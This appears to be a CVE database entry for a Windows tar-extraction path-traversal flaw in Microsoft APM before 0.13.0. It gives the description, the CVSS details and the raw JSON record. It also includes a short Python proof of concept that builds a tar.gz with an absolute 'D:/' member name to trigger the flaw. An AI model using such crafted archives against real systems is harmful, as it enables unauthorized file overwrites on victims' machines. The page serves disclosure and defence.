Security Vulnerability Report
中文
CVE-2026-46383 CVSS 5.5 MEDIUM

CVE-2026-46383

Published: 2026-05-15 17:16:49
Last Modified: 2026-05-15 19:17:04
Source: [email protected]

Description

Microsoft APM is an open-source, community-driven dependency manager for AI agents. Prior to 0.13.0, Microsoft APM contains a Windows-specific archive extraction boundary failure in the legacy-bundle probe used by apm install <bundle> on supported Python 3.10 and 3.11 runtimes. When apm install is given a local .tar.gz that is not recognized as a plugin-format bundle, APM probes whether it is a legacy --format apm bundle. On Python versions earlier than 3.12, that probe extracts untrusted tar members with raw tar.extractall() without rejecting Windows absolute member names such as D:/.... This vulnerability is fixed in 0.13.0.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Microsoft APM < 0.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import tarfile import io # PoC for CVE-2026-46383: Path Traversal via tar extraction # This script creates a malicious tar.gz file containing a file with an absolute path. def create_exploit_tar(output_file): data = b"This is a malicious payload that overwrites a system file." with tarfile.open(output_file, "w:gz") as tar: # Create a TarInfo object for the malicious file info = tarfile.TarInfo(name="D:/exploit_test.txt") info.size = len(data) # Add the file with absolute path to the archive tar.addfile(info, io.BytesIO(data)) print(f"[+] Exploit archive created: {output_file}") print(f"[+] Run 'apm install {output_file}' on a vulnerable system to trigger.") if __name__ == "__main__": create_exploit_tar("malicious_bundle.tar.gz")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-46383", "sourceIdentifier": "[email protected]", "published": "2026-05-15T17:16:49.090", "lastModified": "2026-05-15T19:17:04.220", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microsoft APM is an open-source, community-driven dependency manager for AI agents. Prior to 0.13.0, Microsoft APM contains a Windows-specific archive extraction boundary failure in the legacy-bundle probe used by apm install <bundle> on supported Python 3.10 and 3.11 runtimes. When apm install is given a local .tar.gz that is not recognized as a plugin-format bundle, APM probes whether it is a legacy --format apm bundle. On Python versions earlier than 3.12, that probe extracts untrusted tar members with raw tar.extractall() without rejecting Windows absolute member names such as D:/.... This vulnerability is fixed in 0.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://github.com/microsoft/apm/security/advisories/GHSA-mq5j-pw29-jcv3", "source": "[email protected]"}, {"url": "https://github.com/microsoft/apm/security/advisories/GHSA-mq5j-pw29-jcv3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.